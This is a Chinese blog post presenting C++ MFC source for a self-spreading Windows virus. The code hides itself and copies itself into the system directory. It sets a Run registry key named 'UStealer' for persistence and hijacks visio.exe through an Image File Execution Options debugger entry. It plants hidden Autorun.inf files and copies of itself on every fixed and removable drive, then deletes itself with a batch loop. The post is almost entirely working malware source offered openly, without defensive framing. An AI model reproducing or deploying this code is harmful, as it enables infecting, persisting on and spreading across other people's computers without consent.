VirusBody01

魂恒

于 2019-01-15 16:39:11 发布

阅读量490

点赞数

分类专栏： mfc 文章标签：病毒

本文链接：https://blog.csdn.net/sinat_36391009/article/details/86495148

版权

mfc 专栏收录该内容

8 篇文章 0 订阅

订阅专栏


void CHXVirusBody01Dlg::OnBnClickedOk()
{
	// 拷贝到系统目录
	CopySelf();
	// 修改注册表
	RegChange();
	// 生成autorun.inf文件
	Autorun();
	// 自删除
	DeleteSelf();
}

void CHXVirusBody01Dlg::CopySelf()
{
	// 隐藏窗体
	this->ShowWindow(SW_HIDE);
	TCHAR szSysPath[MAX_PATH] = { 0 };
	GetSystemDirectory(szSysPath, sizeof(szSysPath));
	CString strFileName = szSysPath;
	strFileName += _T("\\test.exe");
	CopyFile(AfxGetApp()->m_pszAppName, strFileName.GetBuffer(), TRUE);
}

void CHXVirusBody01Dlg::DeleteSelf()
{
	//获取自己的完整路径
	char buf[MAX_PATH] = { 0 };
	HMODULE hModel = NULL;
	hModel = GetModuleHandle(0);
	GetModuleFileNameA(hModel, buf, MAX_PATH);
	CloseHandle((HANDLE)4);
	
	//生成批处理文件
	std::fstream  fFile;
	fFile.open(("1.bat"), std::ios::in | std::ios::out | std::ios::app);

	if (!fFile.is_open())
	{
		return ;
	}
	fFile.seekg(std::ios::beg);

	std::string str;
	str = ("@echo off\r\n");

	str += (":start\r\n\tif not exist ");
	str += buf;
	str += (" goto done\r\n");

	str += ("\tdel /f /q ");
	str += buf;
	str += ("\r\n");

	str += ("goto start\r\n");

	str += (":done\r\n");

	str += ("\tdel /f /q %0\r\n");

	fFile << str << std::endl;

	fFile.close();
	//隐藏运行批处理文件
	ShellExecute(NULL, _T("open"), _T("1.bat"), NULL, NULL, SW_HIDE);
	exit(0);
}

void CHXVirusBody01Dlg::RegChange()
{
	// 添加开机启动
	HKEY hKey = NULL;
	DWORD rc;
	char buffer[MAX_PATH] = { 0 };
	rc = ::RegOpenKeyEx(HKEY_LOCAL_MACHINE, 
		_T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 
		0, 
		KEY_ALL_ACCESS, 
		&hKey);
	if (ERROR_SUCCESS == rc)
	{
		auto hx = AfxGetApp();
		::RegSetValueEx(hKey, _T("UStealer"), 0, REG_SZ, (BYTE*)AfxGetApp()->m_pszAppName, lstrlen(AfxGetApp()->m_pszAppName));
		RegCloseKey(hKey);
	}
	// 添加映像劫持列表
	DWORD dwDisposition = REG_CREATED_NEW_KEY;
	if ((::RegCreateKeyEx(HKEY_LOCAL_MACHINE,
		_T("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\visio.exe"),
		0,
		NULL,
		REG_OPTION_NON_VOLATILE,
		KEY_ALL_ACCESS,
		NULL,
		&hKey,
		&dwDisposition)) == ERROR_SUCCESS)
	{
		CString str = AfxGetApp()->m_pszExeName;
		::RegSetValueEx(hKey, _T("Debugger"), 0, REG_SZ, (BYTE*)str.GetBuffer(), str.GetLength());
		::RegCloseKey(hKey);
	}
}

void CHXVirusBody01Dlg::Autorun()
{
	char Disk = NULL;
	UINT Type = 0;
	FILE * fp;
	char strFileName[MAX_PATH] = { 0 };
	char szDriveName[4] = { 0 };
	wsprintfA(szDriveName, ("C\\0"));
	// 遍历所有可能存在的分区
	for (szDriveName[0] = 'C'; szDriveName[0] < 'Z'; ++szDriveName[0])
	{
		// 得到该分区的类型
		Type = GetDriveTypeA(szDriveName);
		if ((Type == DRIVE_REMOVABLE) || (Type == DRIVE_FIXED))
		{
			// 该盘是固定分区或者移动设备,感染
			Disk = szDriveName[0];
			sprintf_s(strFileName, ("%c:\\Autorun.inf"), Disk);
			// 创建Autorun.inf文件并写入内容
			fp = fopen(strFileName, ("w+"));
			fprintf_s(fp, ("[AutoRun]\n"));
			fprintf_s(fp, ("OPEN=test.exe\n"));
			fprintf_s(fp, ("SHELLEXECUTE=test.exe\n"));
			fprintf_s(fp, ("shell\\Auto\\command=test.exe\n"));
			fprintf_s(fp, ("shell=Auto"));
			fclose(fp);
			// 将文件属性设置为隐藏
			SetFileAttributesA(strFileName, FILE_ATTRIBUTE_HIDDEN);
			// 拷贝入这些分区的根目录中
			sprintf_s(strFileName, ("%c:\\test.exe"), Disk);
			CopyFile(AfxGetApp()->m_pszExeName, strFileName, TRUE);
			// 将文件属性设置为隐藏
			SetFileAttributesA(strFileName, FILE_ATTRIBUTE_HIDDEN);
		}
	}
}